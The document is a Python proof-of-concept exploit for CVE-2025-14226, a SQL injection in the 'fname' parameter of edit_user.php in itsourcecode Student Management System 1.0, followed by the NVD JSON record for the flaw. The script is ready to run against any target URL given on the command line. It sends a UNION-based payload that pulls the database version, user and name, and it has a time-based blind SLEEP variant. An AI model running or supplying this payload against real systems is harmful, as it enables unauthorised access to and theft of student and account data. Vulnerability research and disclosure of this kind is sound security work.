CVE-2025-14226

import requests import sys # CVE-2025-14226 PoC - itsourcecode Student Management System SQL Injection # Target: edit_user.php fname parameter def exploit_sqli(url, target_user_id): """ SQL Injection PoC for CVE-2025-14226 Target: itsourcecode Student Management System 1.0 Vulnerable Parameter: fname in /edit_user.php """ # Target URL target_url = f"{url}/edit_user.php" # Payload for SQL Injection (UNION-based extraction) # Extract database version, user, and current database payload = "' UNION SELECT 1,version(),user(),database(),5,6,7,8,9,10,11,12,13,14,15---" # Prepare request data data = { 'fname': payload, 'id': target_user_id, 'btn_sub': '1' } print(f"[*] Targeting: {target_url}") print(f"[*] Payload: {payload}") try: response = requests.post(target_url, data=data, timeout=10) if response.status_code == 200: print(f"[+] Request sent successfully") print(f"[*] Response length: {len(response.text)}") # Check for database info in response if '5.7' in response.text or '8.0' in response.text or 'MariaDB' in response.text: print("[+] SQL Injection successful - Database version detected!") return True else: print("[-] SQL Injection may have failed - No obvious data leak") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False def blind_sqli_time_based(url, target_user_id): """ Time-based blind SQL injection alternative Use when UNION-based injection fails """ # Time-based payload - causes 5 second delay if vulnerable payload = "' AND SLEEP(5)---" data = { 'fname': payload, 'id': target_user_id, 'btn_sub': '1' } print(f"[*] Testing time-based blind SQLi...") try: import time start = time.time() response = requests.post(url, data=data, timeout=15) elapsed = time.time() - start if elapsed >= 5: print(f"[+] Time-based SQL Injection confirmed! Delay: {elapsed}s") return True else: print(f"[-] No time delay detected") return False except Exception as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2025-14226.py <target_url> <user_id>") print("Example: python cve-2025-14226.py http://target.com 1") sys.exit(1) target_url = sys.argv[1].rstrip('/') user_id = sys.argv[2] print("=" * 60) print("CVE-2025-14226 SQL Injection PoC") print("Target: itsourcecode Student Management System 1.0") print("Vulnerability: SQL Injection in /edit_user.php fname parameter") print("=" * 60) # Try UNION-based injection exploit_sqli(target_url, user_id) print("\n[*] PoC execution completed")

{"cve": {"id": "CVE-2025-14226", "sourceIdentifier": "[email protected]", "published": "2025-12-08T10:16:00.640", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in itsourcecode Student Management System 1.0. This vulnerability affects unknown code of the file /edit_user.php. The manipulation of the argument fname leads to sql injection. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. Other parameters might be affected as well."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:angeljudesuarez:student_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "7816C1E9-D65F-4652-A2F5-27FDEAA6B33D"}]}]}], "references": [{"url": "https://github.com/ltranquility/CVE/issues/17", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://itsourcecode.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://vuldb.com/?ctiid.334668", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.334668", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.701801", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}